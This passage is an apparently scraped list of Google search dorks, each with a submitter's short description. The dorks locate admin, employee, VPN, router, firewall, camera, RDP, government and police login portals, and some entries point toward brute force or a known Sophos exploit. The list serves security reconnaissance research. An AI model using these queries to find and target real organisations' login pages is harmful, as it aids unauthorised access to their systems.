"Dork:\r\ninurl:\"passwordreset.php\"\r\n\r\nDescription: This google dork lists out the various pages containing reset\r\npasswords portals.\r\n\r\nAuthor: Abhinav Porwal"}, {"dork": "inurl:adminlogin.jsp", "description": "- *Google Dork:*\r\n\r\n* inurl:adminlogin.jsp*\r\n\r\n- *Results:* *The results gives a list of admin login page of various\r\nwebsite.*\r\n- *Date:* *28/05/2020*\r\n- *Author:* *Vikash Kumar*"}, {"dork": "inurl:adminlogin.html", "description": "inurl:adminlogin.html\r\n\r\nDescription:- This dork id will find the admin login portal devloped under\r\nHTML technology\r\n\r\nAuther:- Deepesh Kumar Pandey"}, {"dork": "inurl:forgotpassword.do", "description": "# Google Dork: inurl:forgotpassword.do\r\n\r\n# Description:- Various pages containing forgot password portals\r\n\r\n# Author: Janmejaya Swain\r\n# Date: 28-May-2020\r\n# Linkedin: https://www.linkedin.com/in/janmejayaswainofficial"}, {"dork": "inurl:adminlogin.do", "description": "# Google Dork inurl:adminlogin.do\r\n\r\n# Description:- list of admin login page of various websites.\r\n\r\n# Author: Janmejaya Swain\r\n# Date: 28-May-2020\r\n# Linkedin: https://www.linkedin.com/in/janmejayaswainofficial"}, {"dork": "inurl:admlogin.aspx", "description": "List of Admin Login Page of various website"}, {"dork": "inurl:admlogin.php", "description": "# Google Dork: inurl:admlogin.php\r\n\r\n# Description:- This page contains various php admin login pages for a web\r\nserver.\r\n\r\n# Author: Suhanaz Kazi\r\n# Date: 29-May-2020\r\n-- \r\nRegards,\r\nSuhanaz"}, {"dork": "inurl:\"/forgotpassword.php\"", "description": "# Google Dork inurl:\"/forgotpassword.php\"\r\n\r\n# Description:- Various pages containing forgot password portals which will\r\ninclude various router password page, govt websites, many other companies\r\nwho have php page of forgot password.\r\n\r\n# Author: Agrah Jain\r\n# Date: 30-May-2020"}, {"dork": "site:*/password_forgotten.php", "description": "Login Portal:\r\n\r\nsite:*/password_forgotten.php\r\n\r\nBR,\r\nReza Abasi(Turku)"}, {"dork": "inurl:adminlogin.htm", "description": "# Google Dork inurl:adminlogin.htm\r\n\r\n# Description:- list of admin login page of various websites.\r\n\r\n# Author: Agrah Jain\r\n# Date: 30-May-2020"}, {"dork": "inurl:\"resetpassword.jsf\"", "description": "Dork:\r\ninurl:\"resetpassword.jsf\"\r\n\r\nDescription: This google dork lists out the various pages containing reset\r\npasswords portals.\r\n\r\nAuthor: Abhinav Porwal"}, {"dork": "inurl:adminpanel.aspx", "description": "inurl:adminpanel.aspx\r\ndescription: Rhis dork id will find the admin panel created with aspx\r\ntechnology\r\n\r\nAuthor: Deepesh Kumar Pandey"}, {"dork": "inurl:userlogin.do", "description": "Dork:\r\ninurl:userlogin.do\r\n\r\nDescription: This google dork lists out the various pages containing user\r\nlogin portals.\r\n\r\nAuthor: Abhinav Porwal\r\nCompany: Cyber Defender\r\nLinkedIn: https://www.linkedin.com/in/abhinavporwal6/"}, {"dork": "inurl:login.do?method=login", "description": "Dork:\r\ninurl:login.do?method=login\r\n\r\nDescription: This google dork lists out the various pages containing login\r\nportals.\r\n\r\nAuthor: Abhinav Porwal\r\nCompany: Cyber Defender\r\nLinkedIn: https://www.linkedin.com/in/abhinavporwal6/"}, {"dork": "inurl:admin/admin/Login", "description": "# Google Dork: inurl:admin/admin/Login\r\n\r\n# Description:- This page contains various admin login portals.\r\n\r\n# Author: Suhanaz Kazi\r\n# Date: 29-May-2020\r\n# Linkedin: http://linkedin.com/in/suhanaaz\r\n-- \r\nRegards,\r\nSuhanaz"}, {"dork": "inurl:auth/Login", "description": "# Google Dork: inurl:auth/Login\r\n\r\n# Description:- This page contains various login pages for a web server.\r\n\r\n# Author: Suhanaz Kazi\r\n# Date: 29-May-2020\r\n# Linkedin: http://linkedin.com/in/suhanaaz\r\n-- \r\nRegards,\r\nSuhanaz"}, {"dork": "inurl:admin/login.aspx", "description": "# Google Dork: inurl:admin/login.aspx\r\n# Results: List of Admin Login Webpage generated by web servers\r\n# running the Microsoft ASP.NET framework.\r\n# Date: 2020-05-31\r\n# Author: Vikash Kumar\r\n# Linkedin: https://www.linkedin.com/in/vikash-kumar-7b938a176\r\n# Twitter: https://twitter.com/vksutk\r\n\r\n\r\n-- \r\nThanks & Regards\r\n*Vikash Kumar*"}, {"dork": "inurl:admin/upload.asp", "description": "# Google Dork: inurl:admin/upload.asp\r\n# Sensitive directories and login portals.\r\n# Date: 29/05/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:resetpassword.do", "description": "Dork: inurl:resetpassword.do\r\n\r\nDescription: This google dork lists out the various pages containing reset\r\npasswords portals.\r\n\r\nAuthor: Abhinav Porwal\r\nCompany: Cyber Defender\r\nLinkedIn: https://www.linkedin.com/in/abhinavporwal6/"}, {"dork": "inurl:\"/index.php?route=account/forgotten\"", "description": "Login Portal:\r\n\r\ninurl:\"/index.php?route=account/forgotten\"\r\n\r\nBR,\r\nReza Abasi(Turku)"}, {"dork": "inurl:emplogin.aspx", "description": "# Google Dork: inurl:emplogin.aspx\r\n# List of Employee login page of various website\r\n# Author: AJAYSEN R"}, {"dork": "inurl:\"passwordreset.asp\"", "description": "Dork:- inurl:\"passwordreset.asp\"\r\nImpact:- Various pages containing password reset portals\r\n\r\nAuthor:- Shivansh Kumar\r\nIndependent security researcher\r\nIndia"}, {"dork": "inurl:admlogin.asp", "description": "# Google Dork : inurl:admlogin.asp\r\n# Description:- This Page contains various asp admin login pages for a web server\r\n# Author: Md Anzaruddin\r\n# Date: 04/06/2020"}, {"dork": "site:*/auth.html intitle:login", "description": "# Google Dork site:*/auth.html intitle:login\r\n# Description:- This dork is used to get the login portals of the websites.\r\n# Author: Agrah Jain\r\n# Date: 30-May-2020\r\n# Linkedin: https://www.linkedin.com/in/agrahjain"}, {"dork": "inurl:\"forgotpassword.php\"", "description": "Dorks : inurl:\"forgotpassword.php\"\r\nDescription: various pages containing forgot passwords portals.\r\nAuthor : Anjali Prakash"}, {"dork": "inurl:emplogin.html", "description": "# Google Dork: inurl:emplogin.html\r\n# Exploit Title: Find the employee login page in different website including 'emplogin' as substring.\r\n# Author: Pritam Singh\r\n\r\n\r\nThanks,\r\n\r\n*Pritam Singh*\r\nSecurity Researcher\r\nCEH, RHCSA, N+\r\n\r\nemail: pritamsingh.cyber@gmail.com"}, {"dork": "intitle:\"index of\" \"admin-login.php\"", "description": "Dork: intitle:\"index of\" \"admin-login.php\"\r\nDescription: This google dorks lists out admin login php pages on web servers.\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:Cpanel/login.aspx", "description": "#Google Dork:- inurl:Cpanel/login.aspx\r\n\r\n\r\n#Description: This Page Contains Various Admin login Pages for a web\r\nserver. Most of them are Vulnerable to Brute force.\r\n\r\n#Author: Md Anzaruddin\r\nLinkedin: https://www.linkedin.com/in/mdanzaruddin/\r\n\r\nTwitter:https://twitter.com/mdanzaruddin\r\n\r\n#Date: 04-June-2020\r\n\r\n---\r\n\r\nRegards:\r\nMd Anzaruddin"}, {"dork": "inurl:Cpanel/login.php", "description": "#Google Dork:- inurl:Cpanel/login.php\r\n\r\n\r\n#Description: This Page Contains Various Admin login Pages for a web server.\r\n\r\n#Author: Md Anzaruddin\r\nLinkedin: https://www.linkedin.com/in/mdanzaruddin/\r\n\r\nTwitter:https://twitter.com/mdanzaruddin\r\n\r\n#Date: 04-June-2020\r\n\r\n---\r\n\r\nRegards:\r\nMd Anzaruddin"}, {"dork": "intitle:adminlogin inurl:login", "description": "#Google Dork:- intitle:adminlogin inurl:login\r\n\r\n\r\n#Description: This Page Contains Various Admin login Pages for a web\r\nserver.\r\n\r\n#Author: Md Anzaruddin\r\nLinkedin: https://www.linkedin.com/in/mdanzaruddin/\r\n\r\nTwitter:https://twitter.com/mdanzaruddin\r\n\r\n#Date: 04-June-2020\r\n\r\n---\r\n\r\nRegards:\r\nMd Anzaruddin"}, {"dork": "inurl:admin/login.jsp", "description": "Dork : inurl:admin/login.jsp\r\nDescription : List of admin login portals of various website.\r\nAuthor: Ajaysen R"}, {"dork": "inurl:employee-login.php", "description": "Dork: inurl:employee-login.php\r\nDescription: This google dorks lists out employee login pages on web servers.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"Intranet Login\"", "description": "# Dork:intitle:\"Intranet Login\"\r\n# Lists Intranet Portals\r\n# Author : Ambadi MP"}, {"dork": "Pages Containing Login Portal into Various Web Server", "description": "#* Google Dork: inurl:\"/index.php?route=account/password\"*\r\n*# Date: 07/06/2020*\r\n*# List of Employee login page of various website*\r\n\r\n\r\n*# Author: Arindam Halder*\r\n*# LinkedIn: www.linkedin.com/in/arindam-halder-0798\r\n*\r\n\r\n*Best Regards,*\r\n*Arindam Halder*"}, {"dork": "intitle:.*edu/login", "description": "Dork: intitle:.*edu/login\r\nDescription: This google dorks lists out edu website login portals.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"*Admin Intranet Login\"", "description": "# Google Dork: intitle:\"*Admin Intranet Login\"\r\n\r\n# Just a few admin intranet login pages.\r\n\r\n# Date: 2020-06-09\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:.*org/login", "description": "#* Google Dork: inurl:.*org/login\r\n\r\n*# google dork to list login portal in .org domain*\r\n\r\n\r\n*# Author: Shankar bhuvanesh\r\nhttps://www.linkedin.com/in/bhuvaneshshankar/"}, {"dork": "intitle:\"index of\" pass.php", "description": "Dork: intitle:\"index of\" pass.php\r\nAuthor: Hemant Patidar (HemantSolo)\r\nLinkedin: https://www.linkedin.com/in/hemantsolo/\r\n-- \r\n\r\nEthical Hacker | Founder and CEO at Solo Securities,\r\n\r\nCyber Security Analyst at Ismile Technologies\r\n\r\nPursuing B.Tech Civil Engineering from SRM University"}, {"dork": "inurl:\".Admin;-aspx }\" \"~Login\"", "description": "Google Dork : inurl:\".Admin;-aspx }\" \"~Login\"\r\n\r\n\r\nAuthor : ANJALI PRAKASH"}, {"dork": "\"login\" intitle:\"intext:\"Welcome to Member\" login\"", "description": "# Google Dork: \"login\" intitle:\"intext:\"Welcome to Member\" login\"\r\n# Various member login pages.\r\n# Date: 10/06/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "index of \"jira\" inurl:login", "description": "Dork: index of \"jira\" inurl:login\r\nDate: 2020-06-14\r\nRegards,\r\nNikhil Kumar"}, {"dork": "inurl:adminlogin.jsp", "description": "#Google Dork:- inurl:adminlogin.jsp\r\n\r\n#Description: This Page Contains Various Admin login Pages for a web server.\r\n\r\n#Author: Md Anzaruddin\r\nLinkedin: https://www.linkedin.com/in/mdanzaruddin/\r\n\r\n\r\n#Date: 15-June-2020\r\n\r\n---\r\n\r\nRegards:\r\nMd Anzaruddin"}, {"dork": "intext:\"index of /\" \"customer.php\" \"~Login\"", "description": "Dork: intext:\"index of /\" \"customer.php\" \"~Login\"\r\nDescription: will give information related to customer and login info.\r\nAuthor: Priyanka Prasad"}, {"dork": "intext:\"Welcome to Intranet\" \"login\"", "description": "# Google Dork: intext:\"Welcome to Intranet\" \"login\"\r\n# Intranet login pages.\r\n# Date: 2020-06-10\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"index.php/user/password/\" intext:Password Reset", "description": "Dork: inurl:\"index.php/user/password/\" intext:Password Reset\r\n\r\n*Ritesh Gohil*\r\n*Security Researcher*\r\n*Linkedin: *https://www.linkedin.com/in/riteshgohil25/"}, {"dork": "inurl:candidatelogin.aspx", "description": "Google Dork : inurl:candidatelogin.aspx\r\nDescription: Used to find candidate login page of different company website\r\n\r\n\r\n-- \r\nWith Regards,\r\nAkhil G Krishnan"}, {"dork": "site:vpn.*.*/ intext:\"login\" intitle:\"login\"", "description": "# Google Dork: site:vpn.*.*/ intext:\"login\" intitle:\"login\"\r\n# Various VPN login pages.\r\n# Date: 29/06/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"index.php/user/password/\"", "description": "inurl:\"index.php/user/password/\""}, {"dork": "allinurl:tsweb/default.htm", "description": "# Google Dork: allinurl:tsweb/default.htm\r\n# Juicy information and sensitive directories regarding Remote Desktop Web\r\n# Connection\r\n# Date: 29/06/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"backend/web/site/login\"", "description": "# Dork : inurl:\"backend/web/site/login\"\r\n# Backend Login Portals\r\n# Author : Ambadi MP"}, {"dork": "inurl:passwordvault intext:cyberark", "description": "# Google Dork: inurl:passwordvault intext:cyberark\r\n# Description: discover publicly available CyberArk\u2019s PVWA portal\r\n# Author: Juan Christian (https://www.linkedin.com/in/juanchristian)"}, {"dork": "inurl:8080/login.php", "description": "Dork: inurl:8080/login.php\r\nAuthor: Priyanka Prasad"}, {"dork": "site:gov.*.*/ intext:\"login\" intitle:\"login\"", "description": "Description: *site:gov.*.*/ intext:\"login\" intitle:\"login\"*\r\n*Various government website login pages.*"}, {"dork": "inurl:/8080/admin.html", "description": "# Google Dork: inurl:/8080/admin.html\r\n# By using this dork, various web cameras can be revealed.\r\n# Date: 2/07/2020\r\n# Author: Alexandros Pappas"}, {"dork": "\"login\" intitle:\"*reports login\"", "description": "# Google Dork : \"login\" intitle:\"*reports login\"\r\n# Description : Various Report login portals.\r\n# Date: 07/07/2020\r\n# Author: Jose Praveen"}, {"dork": "\"TOPdesk ApplicationServer\" inurl:/index.jsp", "description": "# Google Dork: \"TOPdesk ApplicationServer\" inurl:/index.jsp\r\n# Pages containing login portals.\r\n# Date: 8/07/2020\r\n# Author: Alexandros Pappas"}, {"dork": "\"big-ip logout page\" ext:php3", "description": "Dork: \"big-ip logout page\" ext:php3"}, {"dork": "inurl:/opac/index.jsp", "description": "# Google Dork : inurl:/opac/index.jsp\r\n# Description : Pages containing login portals.\r\n# Date: 09/07/2020\r\n# Author: Jose Praveen"}, {"dork": "inurl:client_password=", "description": "Google Dork: inurl:client_password=\r\nExploit Title: various pages containing password reset &\r\nreminder portals and login portals.\r\nDate: 10/07/2020\r\nExploit Author: Sanu Jose M"}, {"dork": "\"login\" intitle:\"*payroll login\"", "description": "# Google Dork: \"login\" intitle:\"*payroll login\"\r\n# Payroll login portals.\r\n# Date: 14/07/2020\r\n# Author: Alexandros Pappas"}, {"dork": "inurl:/seeyon/index.jsp", "description": "# Google Dork : inurl:/seeyon/index.jsp\r\n# Description : Pages containing login portals.\r\n# Date: 11/07/2020\r\n# Author: Jose Praveen"}, {"dork": "inurl:index.php \"Powered by PHP Server Monitor v3.1.1\"", "description": "# Google Dork: inurl:index.php \"Powered by PHP Server Monitor v3.1.1\"\r\n# Pages containing login portals.\r\n# Date: 20/07/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/+CSCOE+/logon.html?", "description": "# Exploit Title: inurl:/+CSCOE+/logon.html?\r\n# Google Dork: inurl:/+CSCOE+/logon.html?\r\n# Date: 24/07/2020\r\n#Dork: CISCO WebVPN Logins\r\n# Author: Supun Halangoda"}, {"dork": "site:com \"sap netweaver portal\"", "description": "Google Dork: site:com \"sap netweaver portal\"\r\nAuthor: Berat ISLER (root1x)\r\n\r\nBest Regards.\r\n\r\nBerat ISLER (root1x)"}, {"dork": "inurl:/webconsole/webpages/login.jsp", "description": "# Google Dork: inurl:/webconsole/webpages/login.jsp\r\n# Various Sophos Login page. Attacker may use https://www.exploit-db.com/exploits/48683 to exploit those pages\r\n# Date: 23/07/2020\r\n# Exploit Author: *Dharmveer Singh*\r\n\r\n[image: image.png]\r\n\r\n\r\n\r\n\r\n[image: image.png]"}, {"dork": "intitle:\"SFXAdmin\" intext:\"Login Form\"", "description": "# Google Dork: intitle:\"SFXAdmin\" intext:\"Login Form\"\r\n# Various pages containing login portals.\r\n# Date: 3/07/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "site:police.*.*/ intext:\"login\" intitle:\"login\"", "description": "# Google Dork: site:police.*.*/ intext:\"login\" intitle:\"login\"\r\n# By using this dork, we can extract various police station login portals\r\n# Date: 3/07/2020\r\n# Author: Dharmveer Singh*\r\n\r\n[image: image.png]"}, {"dork": "site:admin.*.*/ intext:\"login\" intitle:\"login\"", "description": "# Google Dork: site:admin.*.*/ intext:\"login\" intitle:\"login\"\r\n# Various admin login pages.\r\n# Date: 2/07/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"You have accessed a private computer system\" inurl:login", "description": "# Google Dork: \"You have accessed a private computer system\" inurl:login\r\n\r\n# Pages containing login portals.\r\n\r\n# Date: 29/07/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Remote Desktop Web Connection\" inurl:tsweb", "description": "Description: intitle:\"Remote Desktop Web Connection\" inurl:tsweb\r\n\r\nThis dork gives RDP login portals."}, {"dork": "intitle:\"Login - OpenStack Dashboard\" inurl:/dashboard/auth/login", "description": "Google Dork: intitle:\"Login - OpenStack Dashboard\"\r\ninurl:/dashboard/auth/login\r\n\r\nDescription: This dork lists all the login portals to OpenStack Dashboard.\r\n\r\nAuthor: Sibi Mathew George"}, {"dork": "intitle:\"OpenWrt - LuCI\" \"Authorization Required\"", "description": "# Google Dork: intitle:\"OpenWrt - LuCI\" \"Authorization Required\"\r\n# Pages containing login portals.\r\n# Date: 06/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "site:.gov inurl:admin login", "description": "Description- site:.gov inurl:admin login\r\nThis dork gives Admin login panels of many websites."}, {"dork": "intitle:\"NETGEAR\" inurl:\"/base/main_login.html\"", "description": "# Google Dork: intitle:\"NETGEAR\" inurl:\"/base/main_login.html\"\r\n# NETGEAR router login portals.\r\n# Date: 11/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:client_login=", "description": "Exploit Title: Pages containing login portals.\r\n Google Dork: inurl:client_login=\r\n Date: 10/08/2020\r\n Exploit Author: Sanu Jose M\r\n Thanks & regards,\r\n SANU JOSE M"}, {"dork": "intitle:\"D-LINK SYSTEMS, INC. | WIRELESS AP : LOGIN\"", "description": "# Google Dork: intitle:\"D-LINK SYSTEMS, INC. | WIRELESS AP : LOGIN\"\r\n# D-LINK Wireless AP login portals.\r\n# Date: 11/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"DVR LOGIN\" -com", "description": "Google Dork: intitle:\"DVR LOGIN\" -com\r\n\r\nDescription: This google dork is useful for detecting all the login portals of DVR based devices.\r\n\r\nAuthor: Sibi Mathew George\r\n\r\n\r\n\r\n\r\n\r\n----\r\nSent using Guerrillamail.com\r\nBlock or report abuse: https://www.guerrillamail.com//abuse/?a=RU5mDh4gTLITmwu3vn0Qfw%3D%3D"}, {"dork": "intitle:\"Helpdesk Software Login\" \"login\" \"by Jitbit\"", "description": "# Google Dork: intitle:\"Helpdesk Software Login\" \"login\" \"by Jitbit\"\r\n# Ticketing Systems login portals.\r\n# Date: 12/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "allintitle:\"MDVR Login\"", "description": "Google Dork: allintitle:\"MDVR Login\"\r\n\r\nDescription: This google dork is useful for detecting all the login portals\r\nof MDVR based devices.\r\n\r\nAuthor: Sibi Mathew George"}, {"dork": "intitle:\"D-LINK\" inurl:Login.html", "description": "# Google Dork: intitle:\"D-LINK\" inurl:Login.html\r\n# D-LINK router login portals.\r\n# Date: 11/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"axigen webadmin\"", "description": "# Dork: intitle:\"axigen webadmin\"\r\n# Author: Edwyn Sanders\r\n# Date: 16-08-2020\r\n# Description: shows all businesses that use axigen WebAdmin using the web\r\nbrowser\r\n\r\n\r\n\r\nMgter Edwyn Roberto Sanders Rivera\r\nGerente Propietario\r\nEdificaWeb\r\n*E-MAIL:* esanders@edificaweb.com\r\n*Website:* www.edificaweb.com"}, {"dork": "inurl:\"/login?csrfkey=\" intitle:\"cisco email security\"", "description": "# Google Dork: inurl:\"/login?csrfkey=\" intitle:\"cisco email security\"\r\n# CISCO Email Security Appliance login portals.\r\n# Date: 18/08/2020\r\n# Exploit Author: Adithya Chandra\r\n\r\nThanks and Best Regards,\r\nAdithya Chandra"}, {"dork": "site:*/piwik \"Sign in\" \"Matomo\"", "description": "# Google Dork: site:*/piwik \"Sign in\" \"Matomo\"\r\n# Matomo login portals.\r\n# Date: 12/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"NVR LOGIN\" -inurl:\"nvr | com | www | net\"", "description": "Google Dork: intitle:\"NVR LOGIN\" -inurl:\"nvr | com | www | net\"\r\nDescription: This google dork is useful for detecting all the login portals\r\nof NVR based devices.\r\nAuthor: Sibi Mathew George"}, {"dork": "inurl:\"/rpAuth.html\" \"ZyWALL\"", "description": "# Google Dork: inurl:\"/rpAuth.html\" \"ZyWALL\"\r\n# ZyWALL Series Firewall login portals.\r\n# Date: 24/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:device.rsp -com -www", "description": "Google Dork: inurl:device.rsp -com -www\r\n\r\nDescription: This Google Dork is helpful in finding all the login portals\r\nof devices such as XVR, NVR, HVR, DVR, MDVR, AHD, HD IP Camera etc.\r\n\r\nAuthor: Sibi Mathew George"}, {"dork": "inurl:/login.asp \"Configuration and Management\"", "description": "# Google Dork: inurl:/login.asp \"Configuration and Management\"\r\n# Configuration and Management login portals.\r\n# Date: 20/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"Citrix Receiver\" inurl:index.html \"Gateway\"", "description": "# Google Dork: \"Citrix Receiver\" inurl:index.html \"Gateway\"\r\n# Citrix Gateway login portals.\r\n# Date: 26/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"/portal/webclient\" intitle:\"VMware Horizon\"", "description": "# Google Dork: inurl:\"/portal/webclient\" intitle:\"VMware Horizon\"\r\n# Description: This dork will list out all the VMware Horizon login portals.\r\n# Date: 25/08/2020\r\n# Exploit Author: Varsha V Rajan\r\n\r\nThanks & Regards,\r\n\r\nVarsha V Rajan"}, {"dork": "inurl:login_up.php \"Plesk Onyx\"", "description": "# Google Dork: inurl:login_up.php \"Plesk Onyx\"\r\n# Plesk Onyx login portals.\r\n# Date: 26/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Wimax CPE Configuration\"", "description": "# Google Dork: intitle:\"Wimax CPE Configuration\"\r\n# Wimax CPE Configuration portals.\r\n# Date: 30/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"GoAnywhere Web Client - Login\"", "description": "# Google Dork: intitle:\"GoAnywhere Web Client - Login\"\r\n# Login portals.\r\n# Date: 29/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "allintitle:\"Welcome admin\"", "description": "allintitle:\"Welcome admin\"\r\n\r\nDork shows admin pages of various sites"}, {"dork": "intitle:\"login to webmin\" \"You must enter a username and password to login to the Webmin server\"", "description": "intitle:\"login to webmin\" \"You must enter a username and password to login to the Webmin server\"\r\n\r\nBR,\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"Web Login\" \"For security reasons only authorized users are allowed access to this web server. \"", "description": "# Google Dork: intitle:\"Web Login\" \"For security reasons only authorized\r\nusers are allowed access to this web server. \"\r\n\r\n# Login portals.\r\n\r\n# Date: 2/09/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:weblogin.cgi?mobile=0", "description": "# Google Dork: inurl:weblogin.cgi?mobile=0\r\n# ZyXEL (Unified Security Gateways, Firewalls, VPN, etc) login portals.\r\n# Date: 1/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl: authorlogin.php", "description": "#Exploit Title: Pages containing login portals.\r\n #Google Dork: inurl: authorlogin.php\r\n #Date: 07/09/2020\r\n #Exploit Author: Sanu Jose M\r\n\r\n Thanks & regards,\r\n SANU JOSE M"}, {"dork": "\"SonicWALL - Authentication\" inurl:/auth.html", "description": "# Google Dork: \"SonicWALL - Authentication\" inurl:/auth.html\r\n# Pages containing login portals.\r\n# Date: 3/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/userportal/webpages/myaccount/login.jsp", "description": "Dorks:\r\ninurl:/userportal/webpages/myaccount/login.jsp\r\n\r\nSummary:\r\nA Google dork that gives login page for the Sophos XG firewall\r\n\r\n-- \r\nThanks & Regards,\r\nPrasad Lingamaiah"}, {"dork": "\"Retrieve Your Password\" site:*/recoverpassword.aspx", "description": "# Google Dork: \"Retrieve Your Password\" site:*/recoverpassword.aspx\r\n# Login portals (password recovery).\r\n# Date: 22/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Dell SonicWALL - Authentication\" inurl:auth.html", "description": "Google Dork: intitle:\"Dell SonicWALL - Authentication\" inurl:auth.html\r\n\r\nDescription: This Google Dork is used for detecting/fetching login pages of\r\nDell based SonicWALL firewall devices.\r\n\r\nAuthor: Sibi Mathew George"}, {"dork": "site:ftp.*.* \"CrushFTP WebInterface\"", "description": "# Google Dork: site:ftp.*.* \"CrushFTP WebInterface\"\r\n# Pages containing login portals.\r\n# Date: 10/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:webclient/Login.xhtml", "description": "# Google Dork: inurl:webclient/Login.xhtml\r\n# Login portals (Powered by GoAnywhere).\r\n# Date: 10/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"/mifs/user\"", "description": "Google dork description: Mobileiron MDM Login Portals\r\nGoogle Search: inurl:\"/mifs/user\"\r\nSubmitted by: Alfie\r\nTwitter: https://twitter.com/emenalf\r\n\r\n\r\n-- \r\nRegards,\r\nAlfie.\r\nthe-infosec.com"}, {"dork": "inurl:/ mis login", "description": "# Google Dork: inurl:/ mis login\r\n # Date: [15/09/2020]\r\n # Exploit Author: [Raghotham M]\r\n # Category: [Pages Containing Login Portals]\r\n # Description: [ Dork shows admin pages of various sites and Management\r\nInformation System login portals ]"}, {"dork": "site:jira.*.* inurl:/customer/portal/", "description": "# Google Dork: site:jira.*.* inurl:/customer/portal/\r\n# Jira login portals.\r\n# Date: 16/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/ ims login", "description": "# Google Dork: inurl:/ ims login\r\n# Description :- Dork shows admin pages of various sites and Information\r\n# Managenment System login portals\r\n# Date: 21/09/2020\r\n# Author: Sahil Saxena\r\n# LinkedIn: https://www.linkedin.com/in/sahil-saxena-1333b9174\r\n\r\nThanks,\r\nSahil Saxena"}, {"dork": "inurl:\"rms login\"", "description": "# Google Dork: inurl:\"rms login\"\r\n# Author: Abida Shariff\r\n# Category: Pages Containing Login Portals\r\n# Description:\r\nVarious login portals of resource management system sites"}, {"dork": "inurl:\"sms login\"", "description": "#Exploit Title : Dork shows login pages of various sites.\r\n#Google Dork : inurl:\"sms login\"\r\n#Date : 22/09/2020\r\n#Exploit Author : Sanu Jose M\r\n\r\nThanks & Regards,\r\n\r\nSanu Jose M"}, {"dork": "inurl:\"plc login\"", "description": "# Google Dork: inurl:\"plc login\"\r\n# Author: Muralikrishna Janga\r\n# Category: Pages Containing Login Portals\r\n# Description: Various login portals of Public Limited Companies"}, {"dork": "inurl:VirtualEms/Login.aspx", "description": "# Google Dork: inurl:VirtualEms/Login.aspx\r\n# Pages containing login portals.\r\n# Date: 23/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/ lms login", "description": "# Google Dork: inurl:/ lms login\r\n # Date: 22/09/2020\r\n # Author: Raghotham M\r\n # Category: Pages Containing Login Portals\r\n # Description: Dork shows Learning management system portals and admin\r\npages of various sites"}, {"dork": "inurl:idp/SSO.saml2", "description": "# Google Dork: inurl:idp/SSO.saml2\r\n# Date: 9/25/2020\r\n# Exploit Author: Javier Bernardo\r\n# Homepage: https://www.hack.com.ar\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\n\r\n\r\n\r\nBuenos Aires - Argentina"}, {"dork": "inurl:/ Kms login", "description": "#Exploit Title : Dork shows knowledge management system portals and login\r\n# pages of various sites.\r\n\r\n#Google Dork :inurl:/ Kms login\r\n\r\n#Date : 24/09/2020\r\n\r\n#Exploit Author : Sanu Jose M\r\n\r\nThanks & Regards,\r\n\r\nSanu Jose M"}, {"dork": "inurl:AIMS/PS", "description": "# Google Dork: inurl:AIMS/PS\r\n# Date: 9/28/2020\r\n# Exploit Author: Javier Bernardo\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\n\r\n\r\nBuenos Aires - Argentina"}, {"dork": "inurl:/ usda login", "description": "# Google Dork: inurl:/ usda login\r\n# Description :- Dork shows sensitive login portals\r\n# Date: 25/09/2020\r\n# Author: Sahil Saxena\r\n# LinkedIn: https://www.linkedin.com/in/sahil-saxena-1333b9174\r\n# Twitter: https://twitter.com/Sahil_delinitor\r\n# GitHub: https://github.com/Sahil-69\r\n# Bugcrowd: https://bugcrowd.com/Prickn\r\n\r\nThanks,\r\nSahil Saxena"}, {"dork": "inurl:/ emis login", "description": "# Google Dork: inurl:/ emis login\r\n # Date: 25/09/2020\r\n # Author: Raghotham Mruthike\r\n # Category: Pages Containing Login Portals\r\n # Description: Dork shows admin pages of various sites."}, {"dork": "inurl:console-selfservice", "description": "# Google Dork: inurl:console-selfservice# Date: 9/10/2020\r\n# Exploit Author: Javier Bernardo\r\n# RSA Login pages\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\n\r\nBuenos Aires - Argentina"}, {"dork": "inurl:/phpPgAdmin/browser.php intext:\"Servers\" | \"PostgreSQL*\"", "description": "# Google Dork: inurl:/phpPgAdmin/browser.php intext:\"Servers\" |\"PostgreSQL*\"\r\n# phpPgAdmin portals.\r\n# Date: 30/09/2020\r\n# Exploit Author: Alexandros 